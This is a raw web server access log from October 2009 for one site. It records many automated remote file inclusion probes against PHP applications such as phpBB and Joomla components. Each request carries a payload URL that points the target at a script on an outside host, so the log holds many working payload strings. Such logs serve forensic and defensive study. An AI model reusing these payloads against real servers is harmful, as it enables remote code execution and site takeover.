74.205.54.26 - - [30/Oct/2009:09:23:29 -0700] "GET /logs//link_main.php?phpbb_root_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:23:29 -0700] "GET /logs//link_main.php?phpbb_root_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:23:29 -0700] "GET /logs//link_main.php?phpbb_root_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:23:29 -0700] "GET /logs/access_080515.log//link_main.php?phpbb_root_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:23:30 -0700] "GET /link_main.php?phpbb_root_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:23:30 -0700] "GET /logs//link_main.php?phpbb_root_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:23:34 -0700] "GET /logs/access_080515.log//link_main.php?phpbb_root_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:23:34 -0700] "GET /link_main.php?phpbb_root_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:23:34 -0700] "GET /logs//link_main.php?phpbb_root_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:23:35 -0700] "GET /logs/access_080515.log//link_main.php?phpbb_root_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:23:35 -0700] "GET /logs/access_080515.log//link_main.php?phpbb_root_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:23:35 -0700] "GET /link_main.php?phpbb_root_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:23:35 -0700] "GET /link_main.php?phpbb_root_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:23:35 -0700] "GET /logs//link_main.php?phpbb_root_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:23:35 -0700] "GET /logs//link_main.php?phpbb_root_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.47.182 - - [30/Oct/2009:09:24:00 -0700] "GET /logs//link_main.php?phpbb_root_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [30/Oct/2009:09:24:00 -0700] "GET /link_main.php?phpbb_root_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [30/Oct/2009:09:24:00 -0700] "GET /logs/access_080515.log//link_main.php?phpbb_root_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:24:06 -0700] "GET /logs/access_080529.log//link_main.php?phpbb_root_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:24:06 -0700] "GET /logs/access_080529.log//link_main.php?phpbb_root_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:24:07 -0700] "GET /logs/access_080529.log//link_main.php?phpbb_root_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:24:07 -0700] "GET /logs/access_080529.log//link_main.php?phpbb_root_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:24:15 -0700] "GET /logs/access_080529.log//link_main.php?phpbb_root_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:24:15 -0700] "GET /logs/access_080529.log//link_main.php?phpbb_root_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:24:16 -0700] "GET /logs/access_080529.log//link_main.php?phpbb_root_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.47.182 - - [30/Oct/2009:09:24:39 -0700] "GET /logs/access_080529.log//link_main.php?phpbb_root_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
196.40.58.10 - - [30/Oct/2009:09:24:46 -0700] "GET /logs/access_081123.log%20%20//?path%5Bdocroot%5D=http://www.divasvip.com.mx/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:09:25:21 -0700] "GET /logs/access_080529.log//claroline/tracking/userLog.php?rootSys=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:09:25:28 -0700] "GET /Neos_Chronos/header.php?base_folder=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:09:25:28 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:09:25:28 -0700] "GET /logs/access_080103.log%20%20//Neos_Chronos/header.php?base_folder=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:09:25:30 -0700] "GET /logs/access_080106.log//claroline/tracking/userLog.php?rootSys=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "dmulk.com"
112.78.14.2 - - [30/Oct/2009:09:25:32 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://119.69.199.43/bbs//idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
112.78.14.2 - - [30/Oct/2009:09:25:35 -0700] "GET /logs/access_080510.log//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://119.69.199.43/bbs//idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
112.78.14.2 - - [30/Oct/2009:09:25:35 -0700] "GET /logs//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://119.69.199.43/bbs//idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:09:25:37 -0700] "GET /logs/access_080530.log%20%20//Neos_Chronos/header.php?base_folder=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.228.191.194 - - [30/Oct/2009:09:25:41 -0700] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://www.infocleaners.com//fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.228.191.194 - - [30/Oct/2009:09:25:41 -0700] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://www.infocleaners.com//fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.228.191.194 - - [30/Oct/2009:09:25:41 -0700] "GET /logs/access_081008.log//bbs//skin/zero_vote/ask_password.php?dir=http://www.infocleaners.com//fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.252.90.80 - - [30/Oct/2009:09:25:52 -0700] "GET /logs/access_090409.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kannunci.it/case/apache.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.252.90.80 - - [30/Oct/2009:09:25:53 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kannunci.it/case/apache.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.252.90.80 - - [30/Oct/2009:09:25:53 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kannunci.it/case/apache.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.195.124.11 - - [30/Oct/2009:09:26:04 -0700] "GET /logs/access_090306.log/index.php?main=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.195.124.11 - - [30/Oct/2009:09:26:04 -0700] "GET /logs/index.php?main=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.195.124.11 - - [30/Oct/2009:09:26:07 -0700] "GET /index.php?main=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 200 15937 "-" "Mozilla/5.0" "www.dmulk.com"
91.195.124.11 - - [30/Oct/2009:09:26:23 -0700] "GET /logs/access_090306.log/index.php?main=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.195.124.11 - - [30/Oct/2009:09:26:23 -0700] "GET /logs/index.php?main=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.195.124.11 - - [30/Oct/2009:09:26:24 -0700] "GET /index.php?main=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 200 15937 "-" "Mozilla/5.0" "www.dmulk.com"
203.252.90.80 - - [30/Oct/2009:09:26:27 -0700] "GET /logs/access_090204.log/help.php?css_path=http://www.kannunci.it/case/apache.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.252.90.80 - - [30/Oct/2009:09:26:28 -0700] "GET /help.php?css_path=http://www.kannunci.it/case/apache.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.252.90.80 - - [30/Oct/2009:09:26:29 -0700] "GET /logs/help.php?css_path=http://www.kannunci.it/case/apache.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.195.124.11 - - [30/Oct/2009:09:26:59 -0700] "GET /logs/access_090306.log%20%20/index.php?main=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.195.124.11 - - [30/Oct/2009:09:27:06 -0700] "GET /logs/access_090310.log%20%20/index.php?main=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.0.54.130 - - [30/Oct/2009:09:27:06 -0700] "GET /protection.php?action=logout&siteurl=http://www.babyu.co.kr/babyubbs/id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.0.54.130 - - [30/Oct/2009:09:27:07 -0700] "GET /logs//protection.php?action=logout&siteurl=http://www.babyu.co.kr/babyubbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.0.54.130 - - [30/Oct/2009:09:27:07 -0700] "GET /logs/access_080928.log//protection.php?action=logout&siteurl=http://www.babyu.co.kr/babyubbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.195.124.11 - - [30/Oct/2009:09:27:07 -0700] "GET /logs/access_090306.log%20%20/index.php?main=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.195.124.11 - - [30/Oct/2009:09:27:11 -0700] "GET /logs/access_090310.log%20%20/index.php?main=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
112.78.14.2 - - [30/Oct/2009:09:27:12 -0700] "GET /logs/access_080428.log%20%20//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://119.69.199.43/bbs//idfx1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
112.78.14.2 - - [30/Oct/2009:09:27:12 -0700] "GET /logs/access_080510.log%20%20//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://119.69.199.43/bbs//idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.55.143.249 - - [30/Oct/2009:09:27:17 -0700] "GET /logs/access_080313.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://perl.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [30/Oct/2009:09:27:29 -0700] "GET /temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=http://www.rovest.com////language/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [30/Oct/2009:09:27:29 -0700] "GET /logs/access_080228.log%20%20//temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=http://www.rovest.com////language/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [30/Oct/2009:09:27:29 -0700] "GET /logs/access_080205.log%20%20//temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=http://www.rovest.com////language/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [30/Oct/2009:09:27:29 -0700] "GET /logs//temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=http://www.rovest.com////language/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [30/Oct/2009:09:27:30 -0700] "GET /temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=http://www.rovest.com////language/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [30/Oct/2009:09:27:30 -0700] "GET /logs//temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=http://www.rovest.com////language/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [30/Oct/2009:09:27:30 -0700] "GET /logs/access_080228.log//temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=http://www.rovest.com////language/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [30/Oct/2009:09:27:58 -0700] "GET /temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=http://www.rovest.com////language/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [30/Oct/2009:09:27:58 -0700] "GET /logs/access_080228.log//temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=http://www.rovest.com////language/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [30/Oct/2009:09:27:58 -0700] "GET /logs//temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=http://www.rovest.com////language/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.13.191.76 - - [30/Oct/2009:09:27:59 -0700] "GET /logs/access_080531.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://0pop.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
221.143.29.189 - - [30/Oct/2009:09:28:09 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.29.189 - - [30/Oct/2009:09:28:09 -0700] "GET /logs/access_090112.log%20%20/joomla/index.php?option=com_restaurante&task=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.29.189 - - [30/Oct/2009:09:28:09 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.29.189 - - [30/Oct/2009:09:28:09 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.29.189 - - [30/Oct/2009:09:28:09 -0700] "GET /logs/access_080530.log%20%20/joomla/index.php?option=com_restaurante&task=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.123.212.188 - - [30/Oct/2009:09:28:09 -0700] "GET /logs//temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=http://perphorma.com/rela/id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.123.212.188 - - [30/Oct/2009:09:28:09 -0700] "GET /temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=http://perphorma.com/rela/id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.123.212.188 - - [30/Oct/2009:09:28:09 -0700] "GET /logs/access_080205.log%20%20//temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=http://perphorma.com/rela/id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.123.212.188 - - [30/Oct/2009:09:28:09 -0700] "GET /logs/access_080228.log%20%20//temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=http://perphorma.com/rela/id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.29.189 - - [30/Oct/2009:09:28:12 -0700] "GET /logs/access_090112.log%20%20/joomla/index.php?option=com_restaurante&task=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.29.189 - - [30/Oct/2009:09:28:12 -0700] "GET /logs/access_080530.log%20%20/joomla/index.php?option=com_restaurante&task=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.29.189 - - [30/Oct/2009:09:28:12 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.13.191.76 - - [30/Oct/2009:09:28:15 -0700] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://0pop.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
221.143.29.189 - - [30/Oct/2009:09:28:15 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.29.189 - - [30/Oct/2009:09:28:15 -0700] "GET /logs/access_090112.log%20%20/joomla/index.php?option=com_restaurante&task=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.29.189 - - [30/Oct/2009:09:28:15 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.29.189 - - [30/Oct/2009:09:28:15 -0700] "GET /logs/access_080530.log%20%20/joomla/index.php?option=com_restaurante&task=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.13.191.76 - - [30/Oct/2009:09:28:23 -0700] "GET /logs/access_090521.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://0pop.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
152.99.88.235 - - [30/Oct/2009:09:28:44 -0700] "GET /temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=http://perphorma.com/rela/id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
152.99.88.235 - - [30/Oct/2009:09:28:44 -0700] "GET /logs/access_080228.log%20%20//temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=http://perphorma.com/rela/id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
152.99.88.235 - - [30/Oct/2009:09:28:44 -0700] "GET /logs//temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=http://perphorma.com/rela/id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
152.99.88.235 - - [30/Oct/2009:09:28:49 -0700] "GET /logs/access_080205.log%20%20//temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=http://perphorma.com/rela/id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
174.143.3.188 - - [30/Oct/2009:09:28:53 -0700] "GET /include/scripts/export_batch.inc.php?DIR=? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
174.143.3.188 - - [30/Oct/2009:09:28:53 -0700] "GET /logs/include/scripts/export_batch.inc.php?DIR=? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
174.143.3.188 - - [30/Oct/2009:09:28:53 -0700] "GET /include/scripts/export_batch.inc.php?DIR=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
174.143.3.188 - - [30/Oct/2009:09:28:53 -0700] "GET /logs/include/scripts/export_batch.inc.php?DIR=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
202.123.212.188 - - [30/Oct/2009:09:29:20 -0700] "GET /logs/access_080228.log//temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=http://perphorma.com/rela/id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.7.173.20 - - [30/Oct/2009:09:29:28 -0700] "GET /skin/zero_vote/error.php?dir=http://www.shoppingxxxsource.com/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.7.173.20 - - [30/Oct/2009:09:29:28 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.shoppingxxxsource.com/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.7.173.20 - - [30/Oct/2009:09:29:29 -0700] "GET /logs/access_090704.log//skin/zero_vote/error.php?dir=http://www.shoppingxxxsource.com/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.252.90.80 - - [30/Oct/2009:09:29:30 -0700] "GET /logs/access_090121.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kannunci.it/case/apache.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.7.173.20 - - [30/Oct/2009:09:29:37 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.shoppingxxxsource.com/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.13.191.76 - - [30/Oct/2009:09:29:40 -0700] "GET /logs/access_080606.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://0pop.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.12.13.152 - - [30/Oct/2009:09:29:52 -0700] "GET /logs/access_080502.log//newspublish/include.php?path%5Bdocroot%5D=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.12.13.152 - - [30/Oct/2009:09:29:52 -0700] "GET /newspublish/include.php?path%5Bdocroot%5D=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.12.13.152 - - [30/Oct/2009:09:29:52 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
152.99.88.235 - - [30/Oct/2009:09:29:56 -0700] "GET /logs/access_080228.log//temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=http://perphorma.com/rela/id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.252.90.80 - - [30/Oct/2009:09:29:59 -0700] "GET /logs/access_090704.log//skin/zero_vote/error.php?dir=http://www.kannunci.it/case/apache.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
203.252.90.80 - - [30/Oct/2009:09:30:00 -0700] "GET /skin/zero_vote/error.php?dir=http://www.kannunci.it/case/apache.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
203.252.90.80 - - [30/Oct/2009:09:30:04 -0700] "GET /skin/zero_vote/error.php?dir=http://www.kannunci.it/case/apache.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:09:30:13 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:09:30:13 -0700] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:09:30:13 -0700] "GET /logs/access_080416.log%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:09:30:20 -0700] "GET /logs/access_080201.log%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.252.90.80 - - [30/Oct/2009:09:30:55 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.kannunci.it/case/apache.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
